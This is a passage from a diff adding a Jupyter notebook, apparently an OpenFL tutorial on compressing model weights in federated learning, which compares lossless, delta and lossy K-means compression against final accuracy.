kcpipeline.forward(weight_dict[key])\n", + " compressed_model_size += 
len(compressed_weight_dict[key])\n", + " relative_size = compressed_model_size/original_model_size\n", + " print(f'Compressed tensors are {100*relative_size:.1f}% of original model weights')\n", + " return compressed_weight_dict, weight_dict_metadata, relative_size\n", + "\n", + " def backward(self,compressed_weight_dict, weight_dict_metadata):\n", + " kcpipeline = KCPipeline(n_clusters=self.n_clusters)\n", + " weight_dict = {}\n", + " for key in compressed_weight_dict.keys():\n", + " weight_dict[key] = kcpipeline.backward(compressed_weight_dict[key], weight_dict_metadata[key])\n", + " return weight_dict\n", + "\n", + "import numpy as np\n", + "x = {'a': np.array([1,2,3,4,5]), 'b': np.array([[123,234],[234,345]])}\n", + "print(f'x = {x}')\n", + "# Lossless round trip\n", + "compressed_dict, metadata, _ = LosslessCompression.forward(x)\n", + "print(f'compressed array = {compressed_dict}, metadata = {metadata}')\n", + "uncompressed_dict = LosslessCompression.backward(compressed_dict, metadata)\n", + "print(f'uncompressed = {uncompressed_dict}')\n", + "\n", + "# Lossy round trip, using the same instance (and cluster count) in both directions\n", + "lossy_compression = LossyCompression(n_clusters=10)\n", + "compressed_dict, metadata, _ = lossy_compression.forward(x)\n", + "print(f'compressed array = {compressed_dict}, metadata = {metadata}')\n", + "uncompressed_dict = lossy_compression.backward(compressed_dict, metadata)\n", + "print(f'uncompressed = {uncompressed_dict}')" + ], + "metadata": { + "id": "h_8P8jRwxMSQ" + }, + "id": "h_8P8jRwxMSQ", + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "markdown", + "source": [ + "Now let's apply lossless compression to the workflow:" + ], + "metadata": { + "id": "EbLOy4sZ_epb" + }, + "id": "EbLOy4sZ_epb" + }, + { + "cell_type": "code", + "source": [ + "from openfl.experimental.workflow.placement import aggregator, collaborator\n", + "\n", + "class CompressionFlow(FLSpec):\n", + "\n", + " def __init__(self, model=None, optimizer=None, rounds=3, compression=LosslessCompression(), **kwargs):\n", + " 
super().__init__(**kwargs)\n", + " self.compression = compression\n", + " if model is not None:\n", + " self.model = model\n", + " print(f'setting self.model to {model}')\n", + " self.optimizer = optimizer\n", + " else:\n", + " self.model = Net()\n", + " self.optimizer = optim.SGD(self.model.parameters(), lr=learning_rate,\n", + " momentum=momentum)\n", + " self.rounds = rounds\n", + "\n", + " @aggregator\n", + " def start(self):\n", + " print(f'Performing initialization for model')\n", + " self.collaborators = self.runtime.collaborators\n", + " self.current_round = 0\n", + " ################################\n", + " self.compression_ratio = []\n", + " model_weights = get_weights(self.model)\n", + " self.compressed_model_weights, self.compressed_model_metadata, _ = self.compression.forward(model_weights)\n", + " ################################\n", + " self.next(self.aggregated_model_validation, foreach='collaborators')\n", + "\n", + " @collaborator\n", + " def aggregated_model_validation(self):\n", + " model_weights = self.compression.backward(self.compressed_model_weights, self.compressed_model_metadata)\n", + " self.model = set_weights(self.model,model_weights)\n", + " print(f'Performing aggregated model validation for collaborator {self.input}')\n", + " self.agg_validation_score = inference(self.model, self.test_loader)\n", + " print(f'{self.input} value of {self.agg_validation_score}')\n", + " self.next(self.train)\n", + "\n", + " def train_func(self):\n", + " train_losses = []\n", + " for batch_idx, (data, target) in enumerate(self.train_loader):\n", + " self.optimizer.zero_grad()\n", + " output = self.model(data)\n", + " loss = F.nll_loss(output, target)\n", + " loss.backward()\n", + " self.optimizer.step()\n", + " if batch_idx % log_interval == 0:\n", + " print('Train Epoch: 1 [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n", + " batch_idx * len(data), len(self.train_loader.dataset),\n", + " 100. 
* batch_idx / len(self.train_loader), loss.item()))\n", + " self.loss = loss.item()\n", + "\n", + " @collaborator\n", + " def train(self):\n", + " self.model.train()\n", + " self.optimizer = optim.SGD(self.model.parameters(), lr=learning_rate,\n", + " momentum=momentum)\n", + " self.train_func()\n", + " self.next(self.local_model_validation)\n", + "\n", + " @collaborator\n", + " def local_model_validation(self):\n", + " self.local_validation_score = inference(self.model, self.test_loader)\n", + " print(\n", + " f'Doing local model validation for collaborator {self.input}: {self.local_validation_score}')\n", + " model_weights = get_weights(self.model)\n", + " #*********************************\n", + " self.compressed_model_weights, self.compressed_model_metadata, relative_size = self.compression.forward(model_weights)\n", + " self.compression_ratio.append(1.0/relative_size)\n", + " #This will result in only the *compressed model weights* being sent\n", + " self.next(self.join)\n", + "\n", + " @aggregator\n", + " def join(self, inputs):\n", + " self.average_loss = sum(input.loss for input in inputs) / len(inputs)\n", + " self.aggregated_model_accuracy = sum(\n", + " input.agg_validation_score for input in inputs) / len(inputs)\n", + " self.local_model_accuracy = sum(\n", + " input.local_validation_score for input in inputs) / len(inputs)\n", + " print(f'Average aggregated model validation values = {self.aggregated_model_accuracy}')\n", + " print(f'Average training loss = {self.average_loss}')\n", + " print(f'Average local model validation values = {self.local_model_accuracy}')\n", + " model_weight_list = [self.compression.backward(input.compressed_model_weights,input.compressed_model_metadata) for input in inputs]\n", + " model_weights = WeightsOnlyFedAvg(model_weight_list)\n", + " self.optimizer = [input.optimizer for input in inputs][0]\n", + " # Add the compression ratios from each of the collaborators\n", + " self.compression_ratio += [input.compression_ratio[-1] 
for input in inputs]\n", + " self.current_round += 1\n", + " if self.current_round < self.rounds:\n", + " # Use the configured compression so it matches the backward() call on the collaborators\n", + " self.compressed_model_weights, self.compressed_model_metadata, relative_size = self.compression.forward(model_weights)\n", + " self.compression_ratio.append(1.0/relative_size)\n", + " self.next(self.aggregated_model_validation,\n", + " foreach='collaborators')\n", + " else:\n", + " self.next(self.end)\n", + "\n", + " @aggregator\n", + " def end(self):\n", + " print(f'This is the end of the flow')" + ], + "metadata": { + "id": "1MHjm_BCCGTw" + }, + "execution_count": null, + "outputs": [], + "id": "1MHjm_BCCGTw" + }, + { + "cell_type": "markdown", + "source": [ + "Now let's try running the flow with compressed model weights and see the improvement." + ], + "metadata": { + "id": "WFYCCy0YCrrB" + }, + "id": "WFYCCy0YCrrB" + }, + { + "cell_type": "code", + "source": [ + "flflow4 = CompressionFlow(model=Net(), rounds=2)\n", + "flflow4.runtime = updated_local_runtime\n", + "flflow4.run()" + ], + "metadata": { + "id": "sRzPfMiwCzd0" + }, + "id": "sRzPfMiwCzd0", + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "markdown", + "source": [ + "Using lossless compression helped only minimally: the compressed model weights take **~93% of the memory** of the original model tensors (a saving of about 7%).\n", + "\n", + "This is because lossless compression preserves all of the original information, and these model weights do not exhibit much sparsity or redundancy in their current form. If we instead send only the differences between the prior round's model and the current one, those differences should shrink toward zero as the model starts to converge, which should make them more compressible. 
Let's explore that:" + ], + "metadata": { + "id": "50FarAt9KA4u" + }, + "id": "50FarAt9KA4u" + }, + { + "cell_type": "code", + "source": [ + "class WeightsDict(dict):\n", + " \"\"\"\n", + " Convenience type to demonstrate model weight manipulation cleanly\n", + " \"\"\"\n", + " def __add__(self, second_dict):\n", + " # Return a new WeightsDict so that neither operand is modified in place\n", + " result = WeightsDict(self)\n", + " for key in second_dict.keys():\n", + " result[key] = self[key] + second_dict[key]\n", + " return result\n", + "\n", + " def __sub__(self, second_dict):\n", + " # Return a new WeightsDict so that neither operand is modified in place\n", + " result = WeightsDict(self)\n", + " for key in second_dict.keys():\n", + " result[key] = self[key] - second_dict[key]\n", + " return result\n", + "\n", + "x = {'a':5, 'b':7}\n", + "y = {'a':2, 'b':10}\n", + "\n", + "print(f'new weight dict = {WeightsDict(x) + WeightsDict(y)}')\n", + "print(f'subtraction dict = {WeightsDict(x) - WeightsDict(y)}')" + ], + "metadata": { + "id": "gSx4_mq9LQKH" + }, + "id": "gSx4_mq9LQKH", + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "code", + "source": [ + "from copy import deepcopy\n", + "from openfl.experimental.workflow.placement import aggregator, collaborator\n", + "\n", + "class DeltaCompressionFlow(CompressionFlow):\n", + "\n", + " @aggregator\n", + " def start(self):\n", + " print(f'Performing initialization for model')\n", + " self.collaborators = self.runtime.collaborators\n", + " self.current_round = 0\n", + " self.compression_ratio = []\n", + " model_weights = get_weights(self.model)\n", + " self.compressed_model_weights, self.compressed_model_metadata, _ = self.compression.forward(model_weights)\n", + " self.next(self.aggregated_model_validation, foreach='collaborators')\n", + "\n", + " @collaborator\n", + " def aggregated_model_validation(self):\n", + " model_weights = self.compression.backward(self.compressed_model_weights, self.compressed_model_metadata)\n", + " if self.current_round == 0: # Check if prior weights are initialized\n", + " self._prior_model_weights = WeightsDict(model_weights)\n", + " else:\n", + " model_weights = deepcopy(self._prior_model_weights) + 
WeightsDict(deepcopy(model_weights))\n", + " self._prior_model_weights = model_weights\n", + " self.model = set_weights(self.model,model_weights)\n", + " print(f'Performing aggregated model validation for collaborator {self.input}')\n", + " self.agg_validation_score = inference(self.model, self.test_loader)\n", + " print(f'{self.input} value of {self.agg_validation_score}')\n", + " self.next(self.train)\n", + "\n", + " def train_func(self):\n", + " train_losses = []\n", + " for batch_idx, (data, target) in enumerate(self.train_loader):\n", + " self.optimizer.zero_grad()\n", + " output = self.model(data)\n", + " loss = F.nll_loss(output, target)\n", + " loss.backward()\n", + " self.optimizer.step()\n", + " if batch_idx % log_interval == 0:\n", + " print('Train Epoch: 1 [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n", + " batch_idx * len(data), len(self.train_loader.dataset),\n", + " 100. * batch_idx / len(self.train_loader), loss.item()))\n", + " self.loss = loss.item()\n", + "\n", + " @collaborator\n", + " def train(self):\n", + " self.model.train()\n", + " self.optimizer = optim.SGD(self.model.parameters(), lr=learning_rate,\n", + " momentum=momentum)\n", + " self.train_func()\n", + " self.next(self.local_model_validation)\n", + "\n", + " @collaborator\n", + " def local_model_validation(self):\n", + " self.local_validation_score = inference(self.model, self.test_loader)\n", + " print(\n", + " f'Doing local model validation for collaborator {self.input}: {self.local_validation_score}')\n", + " model_weights = get_weights(self.model)\n", + " #*********************************\n", + " weights_delta = WeightsDict(model_weights) - self._prior_model_weights\n", + " self.compressed_model_weights, self.compressed_model_metadata, relative_size = self.compression.forward(weights_delta)\n", + " self.compression_ratio.append(1.0/relative_size)\n", + " self.next(self.join)\n", + "\n", + " @aggregator\n", + " def join(self, inputs):\n", + " self.average_loss = sum(input.loss for 
input in inputs) / len(inputs)\n", + " self.aggregated_model_accuracy = sum(\n", + " input.agg_validation_score for input in inputs) / len(inputs)\n", + " self.local_model_accuracy = sum(\n", + " input.local_validation_score for input in inputs) / len(inputs)\n", + " print(f'Average aggregated model validation values = {self.aggregated_model_accuracy}')\n", + " print(f'Average training loss = {self.average_loss}')\n", + " print(f'Average local model validation values = {self.local_model_accuracy}')\n", + " weights_delta_list = [self.compression.backward(input.compressed_model_weights,input.compressed_model_metadata) for input in inputs]\n", + " # Rebuild each collaborator's model by adding its delta to the current global weights\n", + " prior_global_weights = WeightsDict(deepcopy(get_weights(self.model)))\n", + " model_weight_list = [deepcopy(prior_global_weights) + delta for delta in weights_delta_list]\n", + " model_weights = WeightsOnlyFedAvg(model_weight_list)\n", + " self.model = set_weights(self.model,deepcopy(model_weights))\n", + " self.optimizer = [input.optimizer for input in inputs][0]\n", + " self.current_round += 1\n", + " # Add the compression ratios from each of the collaborators\n", + " self.compression_ratio += [input.compression_ratio[-1] for input in inputs]\n", + " if self.current_round < self.rounds:\n", + " # After round 0 the collaborators add what they receive to their prior weights,\n", + " # so send the change in the global model rather than the full weights\n", + " global_weights_delta = WeightsDict(deepcopy(model_weights)) - prior_global_weights\n", + " self.compressed_model_weights, self.compressed_model_metadata, relative_size = self.compression.forward(global_weights_delta)\n", + " self.compression_ratio.append(1.0/relative_size)\n", + " self.next(self.aggregated_model_validation,\n", + " foreach='collaborators')\n", + " else:\n", + " self.next(self.end)\n", + "\n", + " @aggregator\n", + " def end(self):\n", + " print(f'This is the end of the flow')" + ], + "metadata": { + "id": "Hs7qxwSVOBWx" + }, + "id": "Hs7qxwSVOBWx", + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "markdown", + "source": [ + "Now let's see how much compression has improved:" + ], + "metadata": { + "id": "tjmhX5XlStGx" + }, + "id": "tjmhX5XlStGx" + }, + { + "cell_type": "code", + "source": [ + "flflow5 = 
DeltaCompressionFlow(model=Net(), rounds=2)\n", + "flflow5.runtime = updated_local_runtime\n", + "flflow5.run()" + ], + "metadata": { + "id": "auA_zvZ1SkK2" + }, + "id": "auA_zvZ1SkK2", + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "markdown", + "source": [ + "With deltas, lossless compression improves only marginally: the compressed tensors are now ~92% of the original model size. The reason is that the deltas contain many values that are close to, but not exactly, 0, so a lossless compressor finds few exact repeats to exploit and most of the opportunity to shrink the tensors is lost. Lossy compression can recover that opportunity; case in point:" + ], + "metadata": { + "id": "KJMqxxcWW249" + }, + "id": "KJMqxxcWW249" + }, + { + "cell_type": "code", + "source": [ + "flflow6 = DeltaCompressionFlow(model=Net(), rounds=2, compression=LossyCompression())\n", + "flflow6.runtime = updated_local_runtime\n", + "flflow6.run()" + ], + "metadata": { + "id": "CQ8JOnATXUwy" + }, + "id": "CQ8JOnATXUwy", + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "markdown", + "source": [ + "Now we are getting somewhere! By using lossy compression (applying K-means to each layer tensor, followed by GZIP compression), the resulting tensors take up **13% of their original memory, but with a negative impact on final training accuracy**. There is a trade-off to observe here: as compression goes up, accuracy generally goes down. Compression can have a significant positive effect on how efficiently real-world federations scale, allowing for better performance with larger models or more collaborators, but it's important to find the right compression parameters first.\n", + "\n", + "Let's use the output of each of the flows to compare the average compression ratio (the inverse of the reported relative size) vs. the final accuracy." 
+ ], + "metadata": { + "id": "4-savWezRX5H" + }, + "id": "4-savWezRX5H" + }, + { + "cell_type": "code", + "source": [ + "import matplotlib.pyplot as plt\n", + "\n", + "x1 = np.average(flflow4.compression_ratio)\n", + "y1 = flflow4.aggregated_model_accuracy\n", + "x2 = np.average(flflow5.compression_ratio)\n", + "y2 = flflow5.aggregated_model_accuracy\n", + "x3 = np.average(flflow6.compression_ratio)\n", + "y3 = flflow6.aggregated_model_accuracy\n", + "\n", + "plt.scatter(1,centralized_accuracy,c='black',label='Centralized',alpha=0.5)\n", + "plt.scatter(x1,y1,c='blue',label='Lossless Compression',alpha=0.5)\n", + "plt.scatter(x2,y2,c='red',label='Lossless Delta Compression',alpha=0.5)\n", + "plt.scatter(x3,y3,c='green',label='Lossy Delta Compression',alpha=0.5)\n", + "plt.xlabel('Average Compression Ratio')\n", + "plt.ylabel('Final Accuracy')\n", + "plt.legend()\n", + "plt.show()" + ], + "metadata": { + "id": "fAlWJUPzqV6l" + }, + "id": "fAlWJUPzqV6l", + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "markdown", + "source": [ + "Now let's see if we can tune the number of K-means clusters to achieve a better result. Increasing the number of clusters should intuitively improve accuracy, since each weight is quantized to a closer centroid and less information is lost, at the cost of some compression. Let's increase this from the default of 6 to 50 clusters and see what happens." 
+ ], + "metadata": { + "id": "qNFIFMjiQmWd" + }, + "id": "qNFIFMjiQmWd" + }, + { + "cell_type": "code", + "source": [ + "flflow7 = DeltaCompressionFlow(model=Net(), rounds=2, compression=LossyCompression(n_clusters=50))\n", + "flflow7.runtime = updated_local_runtime\n", + "flflow7.run()" + ], + "metadata": { + "id": "NlRmGVIaRA8D" + }, + "id": "NlRmGVIaRA8D", + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "code", + "source": [ + "x4 = np.average(flflow7.compression_ratio)\n", + "y4 = flflow7.aggregated_model_accuracy\n", + "\n", + "plt.scatter(1,centralized_accuracy,c='black',label='Centralized',alpha=0.5)\n", + "plt.scatter(x1,y1,c='blue',label='Lossless Compression',alpha=0.5)\n", + "plt.scatter(x2,y2,c='red',label='Lossless Delta Compression',alpha=0.5)\n", + "plt.scatter(x3,y3,c='green',label='Lossy Delta Compression',alpha=0.5)\n", + "plt.scatter(x4,y4,c='purple',label='Lossy Delta Compression (50 K-means clusters)',alpha=0.5)\n", + "plt.xlabel('Average Compression Ratio')\n", + "plt.ylabel('Final Accuracy')\n", + "plt.legend()\n", + "plt.show()" + ], + "metadata": { + "id": "Ha9LH75oVKxL" + }, + "id": "Ha9LH75oVKxL", + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "markdown", + "source": [ + "Now that the number of clusters has increased, **the accuracy has risen to ~81% while retaining a 4x reduction in memory footprint**. The accuracy is now roughly in line with lossless compression applied to deltas!" + ], + "metadata": { + "id": "izrJuTMeWPSH" + }, + "id": "izrJuTMeWPSH" + }, + { + "cell_type": "markdown", + "id": "426f2395", + "metadata": { + "id": "426f2395" + }, + "source": [ + "# Next Steps\n", + "You've now gotten a peek into the practical considerations of federated learning framework internals. In subsequent posts, we'll begin building higher-level abstractions that make use of the low-level functionality implemented as part of these workflows. 
We will also go through how to take security to the next level by adding checks on transferred data types, and finally how to deploy these pieces on real hardware. Stay tuned!" + ] + }, + { + "cell_type": "code", + "source": [], + "metadata": { + "id": "Ghh-dsltZmDN" + }, + "id": "Ghh-dsltZmDN", + "execution_count": null, + "outputs": [] + } + ], + "metadata": { + "kernelspec": { + "display_name": "Python 3", + "name": "python3" + }, + "language_info": { + "codemirror_mode": { + "name": "ipython", + "version": 3 + }, + "file_extension": ".py", + "mimetype": "text/x-python", + "name": "python", + "nbconvert_exporter": "python", + "pygments_lexer": "ipython3", + "version": "3.11.5" + }, + "colab": { + "provenance": [], + "private_outputs": true + } + }, + "nbformat": 4, + "nbformat_minor": 5 +} \ No newline at end of file